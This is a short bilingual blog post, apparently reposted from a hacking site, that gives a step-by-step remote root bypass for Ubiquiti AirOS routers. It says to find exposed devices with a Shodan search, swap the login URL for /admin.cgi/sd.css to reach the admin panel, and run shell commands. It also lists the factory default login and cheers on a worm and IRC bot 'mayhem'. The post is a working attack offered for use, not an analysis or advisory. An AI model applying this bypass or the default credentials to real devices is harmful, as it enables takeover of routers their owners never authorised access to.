AirOS remote root 0day
since some genius decided to write worm for this, here is early santa for you, kids:
1. http://www.shodanhq.com/search?q=airos
2. click arbitrary system
3. change http://X.X.X.X/login.cgi?uri=/ to http://X.X.X.X/admin.cgi/sd.css
4. profit?
IRCNet opers: expect some decent KNB bot mayhem for a while :)
AirOS creado por Ubiquiti se basa en un sistema operativo avanzado capaz de manejar un poderoso sistema inalámbrico y funciones de enrutamiento, desarrollado con una interfaz de usuario simple, limpia e intuitiva (a diferencia con otros sistemas).
trae por defecto de fabrica: Usuario: ubnt y Contraseña: ubnt
http://www.airos.com/descargas/manuales/guideAirosLinux.pdf
http://wireless.orosal.es/ubnt/manual_ps2_ns2.pdf
fuente:http://www.blackploit.com/
Se os abrira una ventana como esta:
en la opcion "command line" podeis hacer "help" para ver todos los comados que corre esta OS de router. Con el comando "ls" listamos todos los archivos (como linux) con esa lista podemos acceder a la configuaracion del router.
En la url: http://X.X.X.X/admin.cgi/sd.css podemos sustituirlo por cualquier otro ".cgi" que veamos en ese directorio, para asi poder acceder por la web al mismo.
bom
ResponderEliminar